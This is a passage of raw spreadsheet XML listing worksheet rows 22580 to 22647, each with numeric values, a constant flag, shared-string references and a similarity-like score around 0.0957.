      </c>
      <c r="C22580" s="2" t="s">
        <v>21804</v>
      </c>
      <c r="D22580" s="2">
        <v>1.0</v>
      </c>
      <c r="E22580" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22580" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="22581" ht="15.75" customHeight="1">
      <c r="A22581" s="1">
        <v>12090.0</v>
      </c>
      <c r="B22581" s="2">
        <v>2.6706477E7</v>
      </c>
      <c r="C22581" s="2" t="s">
        <v>21805</v>
      </c>
      <c r="D22581" s="2">
        <v>1.0</v>
      </c>
      <c r="E22581" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22581" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="22582" ht="15.75" customHeight="1">
      <c r="A22582" s="1">
        <v>22023.0</v>
      </c>
      <c r="B22582" s="2">
        <v>3.0094011E7</v>
      </c>
      <c r="C22582" s="2" t="s">
        <v>21806</v>
      </c>
      <c r="D22582" s="2">
        <v>1.0</v>
      </c>
      <c r="E22582" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22582" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="22583" ht="15.75" customHeight="1">
      <c r="A22583" s="1">
        <v>22598.0</v>
      </c>
      <c r="B22583" s="2">
        <v>3.9462504E7</v>
      </c>
      <c r="C22583" s="2" t="s">
        <v>21807</v>
      </c>
      <c r="D22583" s="2">
        <v>1.0</v>
      </c>
      <c r="E22583" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22583" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="22584" ht="15.75" customHeight="1">
      <c r="A22584" s="1">
        <v>23288.0</v>
      </c>
      <c r="B22584" s="2">
        <v>5378993.0</v>
      </c>
      <c r="C22584" s="2" t="s">
        <v>21808</v>
      </c>
      <c r="D22584" s="2">
        <v>1.0</v>
      </c>
      <c r="E22584" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22584" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="22585" ht="15.75" customHeight="1">
      <c r="A22585" s="1">
        <v>26615.0</v>
      </c>
      <c r="B22585" s="2">
        <v>1.8020491E7</v>
      </c>
      <c r="C22585" s="2" t="s">
        <v>21809</v>
      </c>
      <c r="D22585" s="2">
        <v>1.0</v>
      </c>
      <c r="E22585" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22585" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="22586" ht="15.75" customHeight="1">
      <c r="A22586" s="1">
        <v>31091.0</v>
      </c>
      <c r="B22586" s="2">
        <v>4.8415806E7</v>
      </c>
      <c r="C22586" s="2" t="s">
        <v>21810</v>
      </c>
      <c r="D22586" s="2">
        <v>1.0</v>
      </c>
      <c r="E22586" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22586" s="2">
        <v>0.09595959595959595</v>
      </c>
    </row>
    <row r="22587" ht="15.75" customHeight="1">
      <c r="A22587" s="1">
        <v>10735.0</v>
      </c>
      <c r="B22587" s="2">
        <v>1.5306209E7</v>
      </c>
      <c r="C22587" s="2" t="s">
        <v>21811</v>
      </c>
      <c r="D22587" s="2">
        <v>1.0</v>
      </c>
      <c r="E22587" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22587" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="22588" ht="15.75" customHeight="1">
      <c r="A22588" s="1">
        <v>26439.0</v>
      </c>
      <c r="B22588" s="2">
        <v>1.725252E7</v>
      </c>
      <c r="C22588" s="2" t="s">
        <v>21812</v>
      </c>
      <c r="D22588" s="2">
        <v>1.0</v>
      </c>
      <c r="E22588" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22588" s="2">
        <v>0.09595959595959594</v>
      </c>
    </row>
    <row r="22589" ht="15.75" customHeight="1">
      <c r="A22589" s="1">
        <v>9319.0</v>
      </c>
      <c r="B22589" s="2">
        <v>5.558073E7</v>
      </c>
      <c r="C22589" s="2" t="s">
        <v>21813</v>
      </c>
      <c r="D22589" s="2">
        <v>1.0</v>
      </c>
      <c r="E22589" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22589" s="2">
        <v>0.09595959595959591</v>
      </c>
    </row>
    <row r="22590" ht="15.75" customHeight="1">
      <c r="A22590" s="1">
        <v>9780.0</v>
      </c>
      <c r="B22590" s="2">
        <v>5.6517144E7</v>
      </c>
      <c r="C22590" s="2" t="s">
        <v>21814</v>
      </c>
      <c r="D22590" s="2">
        <v>1.0</v>
      </c>
      <c r="E22590" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22590" s="2">
        <v>0.09595959595959591</v>
      </c>
    </row>
    <row r="22591" ht="15.75" customHeight="1">
      <c r="A22591" s="1">
        <v>9830.0</v>
      </c>
      <c r="B22591" s="2">
        <v>5.663441E7</v>
      </c>
      <c r="C22591" s="2" t="s">
        <v>21815</v>
      </c>
      <c r="D22591" s="2">
        <v>1.0</v>
      </c>
      <c r="E22591" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22591" s="2">
        <v>0.09595959595959591</v>
      </c>
    </row>
    <row r="22592" ht="15.75" customHeight="1">
      <c r="A22592" s="1">
        <v>1305.0</v>
      </c>
      <c r="B22592" s="2">
        <v>2.5695973E7</v>
      </c>
      <c r="C22592" s="2" t="s">
        <v>21816</v>
      </c>
      <c r="D22592" s="2">
        <v>1.0</v>
      </c>
      <c r="E22592" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22592" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22593" ht="15.75" customHeight="1">
      <c r="A22593" s="1">
        <v>1629.0</v>
      </c>
      <c r="B22593" s="2">
        <v>2.7979059E7</v>
      </c>
      <c r="C22593" s="2" t="s">
        <v>21817</v>
      </c>
      <c r="D22593" s="2">
        <v>1.0</v>
      </c>
      <c r="E22593" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22593" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22594" ht="15.75" customHeight="1">
      <c r="A22594" s="1">
        <v>2525.0</v>
      </c>
      <c r="B22594" s="2">
        <v>3.4076296E7</v>
      </c>
      <c r="C22594" s="2" t="s">
        <v>21818</v>
      </c>
      <c r="D22594" s="2">
        <v>1.0</v>
      </c>
      <c r="E22594" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22594" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22595" ht="15.75" customHeight="1">
      <c r="A22595" s="1">
        <v>3485.0</v>
      </c>
      <c r="B22595" s="2">
        <v>3.8404361E7</v>
      </c>
      <c r="C22595" s="2" t="s">
        <v>21819</v>
      </c>
      <c r="D22595" s="2">
        <v>1.0</v>
      </c>
      <c r="E22595" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22595" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22596" ht="15.75" customHeight="1">
      <c r="A22596" s="1">
        <v>5563.0</v>
      </c>
      <c r="B22596" s="2">
        <v>4.5993475E7</v>
      </c>
      <c r="C22596" s="2" t="s">
        <v>21820</v>
      </c>
      <c r="D22596" s="2">
        <v>1.0</v>
      </c>
      <c r="E22596" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22596" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22597" ht="15.75" customHeight="1">
      <c r="A22597" s="1">
        <v>9073.0</v>
      </c>
      <c r="B22597" s="2">
        <v>5.5121804E7</v>
      </c>
      <c r="C22597" s="2" t="s">
        <v>21821</v>
      </c>
      <c r="D22597" s="2">
        <v>1.0</v>
      </c>
      <c r="E22597" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22597" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22598" ht="15.75" customHeight="1">
      <c r="A22598" s="1">
        <v>11250.0</v>
      </c>
      <c r="B22598" s="2">
        <v>2.0493657E7</v>
      </c>
      <c r="C22598" s="2" t="s">
        <v>21822</v>
      </c>
      <c r="D22598" s="2">
        <v>1.0</v>
      </c>
      <c r="E22598" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22598" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22599" ht="15.75" customHeight="1">
      <c r="A22599" s="1">
        <v>15187.0</v>
      </c>
      <c r="B22599" s="2">
        <v>4.2034598E7</v>
      </c>
      <c r="C22599" s="2" t="s">
        <v>21823</v>
      </c>
      <c r="D22599" s="2">
        <v>1.0</v>
      </c>
      <c r="E22599" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22599" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22600" ht="15.75" customHeight="1">
      <c r="A22600" s="1">
        <v>19404.0</v>
      </c>
      <c r="B22600" s="2">
        <v>5.5580352E7</v>
      </c>
      <c r="C22600" s="2" t="s">
        <v>21824</v>
      </c>
      <c r="D22600" s="2">
        <v>1.0</v>
      </c>
      <c r="E22600" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22600" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22601" ht="15.75" customHeight="1">
      <c r="A22601" s="1">
        <v>20727.0</v>
      </c>
      <c r="B22601" s="2">
        <v>1.4672129E7</v>
      </c>
      <c r="C22601" s="2" t="s">
        <v>21825</v>
      </c>
      <c r="D22601" s="2">
        <v>1.0</v>
      </c>
      <c r="E22601" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22601" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22602" ht="15.75" customHeight="1">
      <c r="A22602" s="1">
        <v>23815.0</v>
      </c>
      <c r="B22602" s="2">
        <v>7969094.0</v>
      </c>
      <c r="C22602" s="2" t="s">
        <v>21826</v>
      </c>
      <c r="D22602" s="2">
        <v>1.0</v>
      </c>
      <c r="E22602" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22602" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22603" ht="15.75" customHeight="1">
      <c r="A22603" s="1">
        <v>25096.0</v>
      </c>
      <c r="B22603" s="2">
        <v>1.2927925E7</v>
      </c>
      <c r="C22603" s="2" t="s">
        <v>21827</v>
      </c>
      <c r="D22603" s="2">
        <v>1.0</v>
      </c>
      <c r="E22603" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22603" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22604" ht="15.75" customHeight="1">
      <c r="A22604" s="1">
        <v>26199.0</v>
      </c>
      <c r="B22604" s="2">
        <v>1.6237407E7</v>
      </c>
      <c r="C22604" s="2" t="s">
        <v>21828</v>
      </c>
      <c r="D22604" s="2">
        <v>1.0</v>
      </c>
      <c r="E22604" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22604" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22605" ht="15.75" customHeight="1">
      <c r="A22605" s="1">
        <v>26585.0</v>
      </c>
      <c r="B22605" s="2">
        <v>1.7943095E7</v>
      </c>
      <c r="C22605" s="2" t="s">
        <v>21829</v>
      </c>
      <c r="D22605" s="2">
        <v>1.0</v>
      </c>
      <c r="E22605" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22605" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22606" ht="15.75" customHeight="1">
      <c r="A22606" s="1">
        <v>27068.0</v>
      </c>
      <c r="B22606" s="2">
        <v>2.0406505E7</v>
      </c>
      <c r="C22606" s="2" t="s">
        <v>21830</v>
      </c>
      <c r="D22606" s="2">
        <v>1.0</v>
      </c>
      <c r="E22606" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22606" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22607" ht="15.75" customHeight="1">
      <c r="A22607" s="1">
        <v>33506.0</v>
      </c>
      <c r="B22607" s="2">
        <v>8075009.0</v>
      </c>
      <c r="C22607" s="2" t="s">
        <v>21831</v>
      </c>
      <c r="D22607" s="2">
        <v>1.0</v>
      </c>
      <c r="E22607" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22607" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22608" ht="15.75" customHeight="1">
      <c r="A22608" s="1">
        <v>33591.0</v>
      </c>
      <c r="B22608" s="2">
        <v>8328325.0</v>
      </c>
      <c r="C22608" s="2" t="s">
        <v>21832</v>
      </c>
      <c r="D22608" s="2">
        <v>1.0</v>
      </c>
      <c r="E22608" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22608" s="2">
        <v>0.09567901234567902</v>
      </c>
    </row>
    <row r="22609" ht="15.75" customHeight="1">
      <c r="A22609" s="1">
        <v>555.0</v>
      </c>
      <c r="B22609" s="2">
        <v>1.8808563E7</v>
      </c>
      <c r="C22609" s="2" t="s">
        <v>21833</v>
      </c>
      <c r="D22609" s="2">
        <v>1.0</v>
      </c>
      <c r="E22609" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22609" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22610" ht="15.75" customHeight="1">
      <c r="A22610" s="1">
        <v>821.0</v>
      </c>
      <c r="B22610" s="2">
        <v>2.1493019E7</v>
      </c>
      <c r="C22610" s="2" t="s">
        <v>21834</v>
      </c>
      <c r="D22610" s="2">
        <v>1.0</v>
      </c>
      <c r="E22610" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22610" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22611" ht="15.75" customHeight="1">
      <c r="A22611" s="1">
        <v>841.0</v>
      </c>
      <c r="B22611" s="2">
        <v>2.1648765E7</v>
      </c>
      <c r="C22611" s="2" t="s">
        <v>21835</v>
      </c>
      <c r="D22611" s="2">
        <v>1.0</v>
      </c>
      <c r="E22611" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22611" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22612" ht="15.75" customHeight="1">
      <c r="A22612" s="1">
        <v>1064.0</v>
      </c>
      <c r="B22612" s="2">
        <v>2.3513025E7</v>
      </c>
      <c r="C22612" s="2" t="s">
        <v>21836</v>
      </c>
      <c r="D22612" s="2">
        <v>1.0</v>
      </c>
      <c r="E22612" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22612" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22613" ht="15.75" customHeight="1">
      <c r="A22613" s="1">
        <v>1111.0</v>
      </c>
      <c r="B22613" s="2">
        <v>2.405179E7</v>
      </c>
      <c r="C22613" s="2" t="s">
        <v>21837</v>
      </c>
      <c r="D22613" s="2">
        <v>1.0</v>
      </c>
      <c r="E22613" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22613" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22614" ht="15.75" customHeight="1">
      <c r="A22614" s="1">
        <v>1567.0</v>
      </c>
      <c r="B22614" s="2">
        <v>2.7658953E7</v>
      </c>
      <c r="C22614" s="2" t="s">
        <v>21838</v>
      </c>
      <c r="D22614" s="2">
        <v>1.0</v>
      </c>
      <c r="E22614" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22614" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22615" ht="15.75" customHeight="1">
      <c r="A22615" s="1">
        <v>1714.0</v>
      </c>
      <c r="B22615" s="2">
        <v>2.8592145E7</v>
      </c>
      <c r="C22615" s="2" t="s">
        <v>21839</v>
      </c>
      <c r="D22615" s="2">
        <v>1.0</v>
      </c>
      <c r="E22615" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22615" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22616" ht="15.75" customHeight="1">
      <c r="A22616" s="1">
        <v>1726.0</v>
      </c>
      <c r="B22616" s="2">
        <v>2.8729611E7</v>
      </c>
      <c r="C22616" s="2" t="s">
        <v>21840</v>
      </c>
      <c r="D22616" s="2">
        <v>1.0</v>
      </c>
      <c r="E22616" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22616" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22617" ht="15.75" customHeight="1">
      <c r="A22617" s="1">
        <v>1729.0</v>
      </c>
      <c r="B22617" s="2">
        <v>2.874274E7</v>
      </c>
      <c r="C22617" s="2" t="s">
        <v>21841</v>
      </c>
      <c r="D22617" s="2">
        <v>1.0</v>
      </c>
      <c r="E22617" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22617" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22618" ht="15.75" customHeight="1">
      <c r="A22618" s="1">
        <v>2040.0</v>
      </c>
      <c r="B22618" s="2">
        <v>3.0893224E7</v>
      </c>
      <c r="C22618" s="2" t="s">
        <v>21842</v>
      </c>
      <c r="D22618" s="2">
        <v>1.0</v>
      </c>
      <c r="E22618" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22618" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22619" ht="15.75" customHeight="1">
      <c r="A22619" s="1">
        <v>2320.0</v>
      </c>
      <c r="B22619" s="2">
        <v>3.2889406E7</v>
      </c>
      <c r="C22619" s="2" t="s">
        <v>21843</v>
      </c>
      <c r="D22619" s="2">
        <v>1.0</v>
      </c>
      <c r="E22619" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22619" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22620" ht="15.75" customHeight="1">
      <c r="A22620" s="1">
        <v>2436.0</v>
      </c>
      <c r="B22620" s="2">
        <v>3.3667358E7</v>
      </c>
      <c r="C22620" s="2" t="s">
        <v>21844</v>
      </c>
      <c r="D22620" s="2">
        <v>1.0</v>
      </c>
      <c r="E22620" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22620" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22621" ht="15.75" customHeight="1">
      <c r="A22621" s="1">
        <v>2480.0</v>
      </c>
      <c r="B22621" s="2">
        <v>3.3853794E7</v>
      </c>
      <c r="C22621" s="2" t="s">
        <v>21845</v>
      </c>
      <c r="D22621" s="2">
        <v>1.0</v>
      </c>
      <c r="E22621" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22621" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22622" ht="15.75" customHeight="1">
      <c r="A22622" s="1">
        <v>2539.0</v>
      </c>
      <c r="B22622" s="2">
        <v>3.4108329E7</v>
      </c>
      <c r="C22622" s="2" t="s">
        <v>21846</v>
      </c>
      <c r="D22622" s="2">
        <v>1.0</v>
      </c>
      <c r="E22622" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22622" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22623" ht="15.75" customHeight="1">
      <c r="A22623" s="1">
        <v>2613.0</v>
      </c>
      <c r="B22623" s="2">
        <v>3.4454672E7</v>
      </c>
      <c r="C22623" s="2" t="s">
        <v>21847</v>
      </c>
      <c r="D22623" s="2">
        <v>1.0</v>
      </c>
      <c r="E22623" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22623" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22624" ht="15.75" customHeight="1">
      <c r="A22624" s="1">
        <v>2622.0</v>
      </c>
      <c r="B22624" s="2">
        <v>3.4497323E7</v>
      </c>
      <c r="C22624" s="2" t="s">
        <v>21848</v>
      </c>
      <c r="D22624" s="2">
        <v>1.0</v>
      </c>
      <c r="E22624" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22624" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22625" ht="15.75" customHeight="1">
      <c r="A22625" s="1">
        <v>3285.0</v>
      </c>
      <c r="B22625" s="2">
        <v>3.7504586E7</v>
      </c>
      <c r="C22625" s="2" t="s">
        <v>21849</v>
      </c>
      <c r="D22625" s="2">
        <v>1.0</v>
      </c>
      <c r="E22625" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22625" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22626" ht="15.75" customHeight="1">
      <c r="A22626" s="1">
        <v>3287.0</v>
      </c>
      <c r="B22626" s="2">
        <v>3.7504586E7</v>
      </c>
      <c r="C22626" s="2" t="s">
        <v>21850</v>
      </c>
      <c r="D22626" s="2">
        <v>1.0</v>
      </c>
      <c r="E22626" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22626" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22627" ht="15.75" customHeight="1">
      <c r="A22627" s="1">
        <v>3292.0</v>
      </c>
      <c r="B22627" s="2">
        <v>3.7513189E7</v>
      </c>
      <c r="C22627" s="2" t="s">
        <v>21851</v>
      </c>
      <c r="D22627" s="2">
        <v>1.0</v>
      </c>
      <c r="E22627" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22627" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22628" ht="15.75" customHeight="1">
      <c r="A22628" s="1">
        <v>3331.0</v>
      </c>
      <c r="B22628" s="2">
        <v>3.7682621E7</v>
      </c>
      <c r="C22628" s="2" t="s">
        <v>21852</v>
      </c>
      <c r="D22628" s="2">
        <v>1.0</v>
      </c>
      <c r="E22628" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22628" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22629" ht="15.75" customHeight="1">
      <c r="A22629" s="1">
        <v>3595.0</v>
      </c>
      <c r="B22629" s="2">
        <v>3.9066186E7</v>
      </c>
      <c r="C22629" s="2" t="s">
        <v>21853</v>
      </c>
      <c r="D22629" s="2">
        <v>1.0</v>
      </c>
      <c r="E22629" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22629" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22630" ht="15.75" customHeight="1">
      <c r="A22630" s="1">
        <v>3887.0</v>
      </c>
      <c r="B22630" s="2">
        <v>4.0378582E7</v>
      </c>
      <c r="C22630" s="2" t="s">
        <v>21854</v>
      </c>
      <c r="D22630" s="2">
        <v>1.0</v>
      </c>
      <c r="E22630" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22630" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22631" ht="15.75" customHeight="1">
      <c r="A22631" s="1">
        <v>4049.0</v>
      </c>
      <c r="B22631" s="2">
        <v>4.107692E7</v>
      </c>
      <c r="C22631" s="2" t="s">
        <v>21855</v>
      </c>
      <c r="D22631" s="2">
        <v>1.0</v>
      </c>
      <c r="E22631" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22631" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22632" ht="15.75" customHeight="1">
      <c r="A22632" s="1">
        <v>4135.0</v>
      </c>
      <c r="B22632" s="2">
        <v>4.1387443E7</v>
      </c>
      <c r="C22632" s="2" t="s">
        <v>21856</v>
      </c>
      <c r="D22632" s="2">
        <v>1.0</v>
      </c>
      <c r="E22632" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22632" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22633" ht="15.75" customHeight="1">
      <c r="A22633" s="1">
        <v>4214.0</v>
      </c>
      <c r="B22633" s="2">
        <v>4.1701404E7</v>
      </c>
      <c r="C22633" s="2" t="s">
        <v>21857</v>
      </c>
      <c r="D22633" s="2">
        <v>1.0</v>
      </c>
      <c r="E22633" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22633" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22634" ht="15.75" customHeight="1">
      <c r="A22634" s="1">
        <v>4238.0</v>
      </c>
      <c r="B22634" s="2">
        <v>4.1787731E7</v>
      </c>
      <c r="C22634" s="2" t="s">
        <v>21858</v>
      </c>
      <c r="D22634" s="2">
        <v>1.0</v>
      </c>
      <c r="E22634" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22634" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22635" ht="15.75" customHeight="1">
      <c r="A22635" s="1">
        <v>4255.0</v>
      </c>
      <c r="B22635" s="2">
        <v>4.1812253E7</v>
      </c>
      <c r="C22635" s="2" t="s">
        <v>21859</v>
      </c>
      <c r="D22635" s="2">
        <v>1.0</v>
      </c>
      <c r="E22635" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22635" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22636" ht="15.75" customHeight="1">
      <c r="A22636" s="1">
        <v>4453.0</v>
      </c>
      <c r="B22636" s="2">
        <v>4.2409492E7</v>
      </c>
      <c r="C22636" s="2" t="s">
        <v>21860</v>
      </c>
      <c r="D22636" s="2">
        <v>1.0</v>
      </c>
      <c r="E22636" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22636" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22637" ht="15.75" customHeight="1">
      <c r="A22637" s="1">
        <v>4592.0</v>
      </c>
      <c r="B22637" s="2">
        <v>4.28034E7</v>
      </c>
      <c r="C22637" s="2" t="s">
        <v>21861</v>
      </c>
      <c r="D22637" s="2">
        <v>1.0</v>
      </c>
      <c r="E22637" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22637" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22638" ht="15.75" customHeight="1">
      <c r="A22638" s="1">
        <v>4649.0</v>
      </c>
      <c r="B22638" s="2">
        <v>4.3081522E7</v>
      </c>
      <c r="C22638" s="2" t="s">
        <v>21862</v>
      </c>
      <c r="D22638" s="2">
        <v>1.0</v>
      </c>
      <c r="E22638" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22638" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22639" ht="15.75" customHeight="1">
      <c r="A22639" s="1">
        <v>4659.0</v>
      </c>
      <c r="B22639" s="2">
        <v>4.3133642E7</v>
      </c>
      <c r="C22639" s="2" t="s">
        <v>21863</v>
      </c>
      <c r="D22639" s="2">
        <v>1.0</v>
      </c>
      <c r="E22639" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22639" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22640" ht="15.75" customHeight="1">
      <c r="A22640" s="1">
        <v>4770.0</v>
      </c>
      <c r="B22640" s="2">
        <v>4.3435145E7</v>
      </c>
      <c r="C22640" s="2" t="s">
        <v>21864</v>
      </c>
      <c r="D22640" s="2">
        <v>1.0</v>
      </c>
      <c r="E22640" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22640" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22641" ht="15.75" customHeight="1">
      <c r="A22641" s="1">
        <v>4878.0</v>
      </c>
      <c r="B22641" s="2">
        <v>4.3851774E7</v>
      </c>
      <c r="C22641" s="2" t="s">
        <v>21865</v>
      </c>
      <c r="D22641" s="2">
        <v>1.0</v>
      </c>
      <c r="E22641" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22641" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22642" ht="15.75" customHeight="1">
      <c r="A22642" s="1">
        <v>4987.0</v>
      </c>
      <c r="B22642" s="2">
        <v>4.4143921E7</v>
      </c>
      <c r="C22642" s="2" t="s">
        <v>21866</v>
      </c>
      <c r="D22642" s="2">
        <v>1.0</v>
      </c>
      <c r="E22642" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22642" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22643" ht="15.75" customHeight="1">
      <c r="A22643" s="1">
        <v>5192.0</v>
      </c>
      <c r="B22643" s="2">
        <v>4.4794404E7</v>
      </c>
      <c r="C22643" s="2" t="s">
        <v>21867</v>
      </c>
      <c r="D22643" s="2">
        <v>1.0</v>
      </c>
      <c r="E22643" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22643" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22644" ht="15.75" customHeight="1">
      <c r="A22644" s="1">
        <v>5271.0</v>
      </c>
      <c r="B22644" s="2">
        <v>4.5147927E7</v>
      </c>
      <c r="C22644" s="2" t="s">
        <v>21868</v>
      </c>
      <c r="D22644" s="2">
        <v>1.0</v>
      </c>
      <c r="E22644" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22644" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22645" ht="15.75" customHeight="1">
      <c r="A22645" s="1">
        <v>5481.0</v>
      </c>
      <c r="B22645" s="2">
        <v>4.5731536E7</v>
      </c>
      <c r="C22645" s="2" t="s">
        <v>21869</v>
      </c>
      <c r="D22645" s="2">
        <v>1.0</v>
      </c>
      <c r="E22645" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22645" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22646" ht="15.75" customHeight="1">
      <c r="A22646" s="1">
        <v>5566.0</v>
      </c>
      <c r="B22646" s="2">
        <v>4.6004236E7</v>
      </c>
      <c r="C22646" s="2" t="s">
        <v>21870</v>
      </c>
      <c r="D22646" s="2">
        <v>1.0</v>
      </c>
      <c r="E22646" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22646" s="2">
        <v>0.09567901234567901</v>
      </c>
    </row>
    <row r="22647" ht="15.75" customHeight="1">
      <c r="A22647" s="1">
        <v>5724.0</v>
      </c>
      <c r="B22647" s="2">
        <v>4.6603494E7</v>
      </c>
